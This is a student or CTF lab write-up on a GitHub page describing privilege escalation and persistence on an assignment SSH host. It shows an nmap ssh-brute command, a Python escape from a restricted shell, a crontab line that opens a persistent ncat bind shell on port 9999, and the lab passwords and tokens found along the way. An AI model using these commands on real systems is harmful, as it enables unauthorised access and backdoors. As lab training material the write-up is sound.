Skip to content

Latest commit

 

History

History
59 lines (42 loc) · 2.47 KB

06.md

File metadata and controls

59 lines (42 loc) · 2.47 KB
Raw

6: Privilege Escalation and Persistence

The task is simple: Get SSH access to [email protected] and find flag. We are given a hint: Despite being a criminal mastermind, this person loves reading superhero comic books….. nerd!

So first we tried to bruteforce the password for user moriarty using the list of 1000 most common passwords (https://raw.githubusercontent.com/DavidWittman/wpxmlrpcbrute/master/wordlists/1000-most-common-passwords.txt) and command:

sudo nmap -sS -sV -p 22 192.168.1.193 -v -n --script ssh-brute --script-args userdb=names.txt,passdb=1000-most-common-passwords.txt

This sadly failed and didn't find the correct password. So we tried to guess what the password might be and on the first try we get in; the password was 'batman'.

After getting in we see, that we have only 2 command available, python and ls. Using python we are able to spawn a shell:

import os; print(os.system('/bin/bash'))

After that, we could roam freely all over the server. First thing we did was to have some persistence we added following line to crontab:

(crontab -l ; echo "@reboot sleep 200 && ncat -l 9999 -k -c /bin/bash")|crontab 2> /dev/null

Which will upon reboot spawn a shell acessible on port 9999.

After that, we explore more of what we can do. After a few minutes we stumble upon folder assignment07 under /home/user which contains script for the 7th assignment. In file password_rotator.sh we find whole script for the assignment from which we draw following conclusions:

  1. The passwords that the user rotates are: "superman" "ironman" "batman" "4a7#mgannn2LDD90T#1fX#0Yx%m!kxrMSmUXd60xKwdM0S6u"

  2. The file with second token is: /var/tmp/tokens/second_token.txt and it's content changes to following values: "Hysterical" "Spaghetti" "Floss" "Apparently" which together give the token for second part of the assignment: HystericalSpaghettiFlossApparently This token is also in the first comment in the script

#TOKEN:HystericalSpaghettiFlossApparently

  1. The flag server for second part of the assignment is 192.168.1.167:9453

  2. On password rotation all ssh session to moriarty are killed so we won't be able to persist our ssh connection but we can definitely spawn a remote shell which shouldn't get killed by the script.

After looking into the /vat/tmp/tokens folder we find token and flag server for first part of the task as well. We try to submit both flags but flag for token for the part B doesn't work which we later get to know was unintentional.